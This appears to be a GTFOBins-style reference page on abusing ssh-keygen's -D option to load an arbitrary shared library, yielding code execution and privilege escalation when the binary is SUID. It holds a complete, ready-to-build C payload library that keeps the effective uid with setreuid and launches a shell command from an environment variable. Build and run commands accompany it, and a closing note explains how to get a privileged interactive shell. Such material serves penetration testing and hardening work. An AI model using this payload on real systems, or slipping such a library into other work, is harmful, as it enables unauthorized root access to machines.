ssh-keygen
Code execution/Privilege escalation
The binary ssh-keygen
can be made to load custom libraries via the -D
switch, which is meant to take the path of a PKCS#11 provider. Whatever
shared object is given there is loaded with dlopen(), so this can result in
arbitrary code execution. If ssh-keygen
has SUID set, this can also lead to privilege escalation.
ssh-keygen -D /path/to/custom/library.so
The easiest way to write a library in such a way that its code is executed by ssh-keygen
is to add a library constructor (a function marked
__attribute__((constructor))
), which the dynamic loader runs as soon as the library is loaded:
#include <stdio.h>

void __attribute__((constructor)) constructor(void)
{
    printf("I will be executed on library load!\n");
}
Note that ssh-keygen
makes a rudimentary check on the library! In particular, after dlopen()ing it,
ssh-keygen looks up a function named C_GetFunctionList()
with dlsym() and rejects the provider if it is missing. The function signature does not matter, but the symbol has to be present!
Because the lookup happens after dlopen(), a constructor has already run by the
time the check fails; exporting the symbol keeps ssh-keygen from erroring out.
int C_GetFunctionList(void) { return 1; }
A ready-made codebase for getting code execution is available here.
This codebase also preserves the effective user ID, so that a spawned shell does
not drop it. This is useful if ssh-keygen
is run with SUID, for example.
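The following is a complete provider library that puts the two pieces above
together (the constructor and the C_GetFunctionList() stub) and also keeps the
effective user ID the way the ready-made codebase is described as doing. It is
an added example written for this page, not the linked codebase and not code
from OpenSSH. The PAYLOAD_CMD environment variable, and the function names
running_setuid() and adopt_effective_uid(), are this example's own inventions;
ssh-keygen knows nothing about them.

```c
/* payload.c - example ssh-keygen -D provider (added example, not the
 * ready-made codebase linked above). Build and load with:
 *   cc -shared -fPIC -o payload.so payload.c
 *   PAYLOAD_CMD='id' ssh-keygen -D ./payload.so
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Non-zero if the host process was started from a set-user-ID binary,
 * i.e. its real and effective uid differ. */
int running_setuid(void)
{
    return getuid() != geteuid();
}

/* Make the real uid equal to the effective uid (setreuid() also updates the
 * saved uid when the real uid changes). An unprivileged process may always
 * set its real uid to its effective uid, so this works whether ssh-keygen is
 * SUID root or SUID some other account. Without this step a spawned sh/bash
 * notices ruid != euid and drops back to the real uid, losing the privilege.
 * Returns 0 on success, -1 on failure (errno is set). */
int adopt_effective_uid(void)
{
    uid_t euid = geteuid();
    return setreuid(euid, euid) == 0 ? 0 : -1;
}

/* Runs inside dlopen(), i.e. before ssh-keygen has looked up any symbol. */
__attribute__((constructor))
static void on_load(void)
{
    int was_setuid = running_setuid();
    /* Assumption of this example: the command to run is taken from our own
     * PAYLOAD_CMD variable so the same .so can be reused. SUID binaries keep
     * ordinary environment variables (only LD_* and similar are scrubbed). */
    const char *cmd = getenv("PAYLOAD_CMD");

    if (adopt_effective_uid() != 0)
        perror("setreuid");
    fprintf(stderr, "[payload] loaded in pid %ld: uid=%u euid=%u (setuid binary: %s)\n",
            (long)getpid(), (unsigned)getuid(), (unsigned)geteuid(),
            was_setuid ? "yes" : "no");

    if (cmd != NULL) {
        /* Replace ssh-keygen with the requested command; with ruid == euid
         * the shell keeps whatever privilege the SUID bit gave us. */
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        perror("execl");
    }
}

/* Looked up with dlsym() after dlopen(); the provider is rejected if this
 * symbol is missing. A real PKCS#11 module fills in a function table through
 * the pointer argument; we just return a non-zero (non-CKR_OK) value so that
 * ssh-keygen gives up on us, which is fine because the constructor above has
 * already run by then. */
int C_GetFunctionList(void *function_list_out)
{
    (void)function_list_out;
    return 1;
}
```

Without PAYLOAD_CMD the library only reports the uids it was loaded with, which
is a safe way to confirm that a given ssh-keygen really loads the path you pass
to -D and whether it runs SUID; PAYLOAD_CMD=/bin/sh then turns that into an
interactive shell that keeps the effective uid.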